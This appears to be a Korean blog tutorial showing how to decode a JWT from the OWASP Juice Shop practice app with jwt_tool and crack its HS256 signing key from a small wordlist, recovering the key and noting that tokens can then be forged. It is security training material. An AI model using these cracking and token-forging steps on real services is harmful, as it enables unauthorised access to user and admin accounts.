jwt.io 에서는 jwt를 생성하거나 생성된 jwt를 디코딩하여 볼 수 있다.

 

jwt_tool은 파이선으로 제작되었으며 명령어를 이용해 secret key를 크래킹하여 토큰을 생성할 수 있는 키를 추출할 수 있다.

 

실습을 위해 OWASP Juice Shop 의 jwt를 rs256에서 hs256으로 변경하여 생성한다.

 

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImFkbWluQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHRBZG1pbi5wbmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjQtMDMtMTAgMDg6MjU6MjAuNTc2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjQtMDMtMTAgMDg6MjU6MjAuNTc2ICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTcxMDA1OTc4MH0.BU-SSMhRN5_tei_3bgkjxJDoXQNRN6jLyDVm2WtWKhk

 

https://github.com/ticarpi/jwt_tool 에서 다운로드 하여 해당 값을 디코딩하면 아래와 같이 확인 가능하다.

(파이썬 및 추가 모듈 설치 필요)

 

% python3 jwt_tool.py eyJ~~~~~

 

Original JWT: 

 

=====================

Decoded Token Values:

=====================

 

Token header values:

[+] typ = "JWT"

[+] alg = "HS256"

 

Token payload values:

[+] status = "success"

[+] data = JSON object:

    [+] id = 1

    [+] username = ""

    [+] email = "admin@juice-sh.op"

    [+] password = "0192023a7bbd73250516f069df18b500"

    [+] role = "admin"

    [+] deluxeToken = ""

    [+] lastLoginIp = ""

    [+] profileImage = "assets/public/images/uploads/defaultAdmin.png"

    [+] totpSecret = ""

    [+] isActive = True

    [+] createdAt = "2024-03-10 08:25:20.576 +00:00"

    [+] updatedAt = "2024-03-10 08:25:20.576 +00:00"

    [+] deletedAt = "None"

[+] iat = 1710059780    ==> TIMESTAMP = 2024-03-10 17:36:20 (UTC)

 

----------------------

JWT common timestamps:

iat = IssuedAt

exp = Expires

nbf = NotBefore

----------------------

 

 

 

임의 지정한 키를 딕셔너리 파일에서 크래킹하기 위해 사전 파일을 생성하고 크래킹 해본다.

 

[crapi.txt]

crapi

crrrr

 

abdsfd

 

 

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImFkbWluQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHRBZG1pbi5wbmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjQtMDMtMTAgMDg6MjU6MjAuNTc2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjQtMDMtMTAgMDg6MjU6MjAuNTc2ICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTcxMDA1OTc4MH0.BU-SSMhRN5_tei_3bgkjxJDoXQNRN6jLyDVm2WtWKhk -C -d crapi.txt

 

Original JWT: 

 

[+] crapi is the CORRECT key!

You can tamper/fuzz the token contents (-T/-I) and sign it using:

python3 jwt_tool.py [options here] -S hs256 -p "crapi

 

jwt_tool의 최초 실행 때는 컨피그 파일이 없어서 생성했다는 메시지가 나온다.

한 번 더 실행해 주면 된다.

 

 

No config file yet created.

Running config setup.

Configuration file built - review contents of "jwtconf.ini" to customise your options.

Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.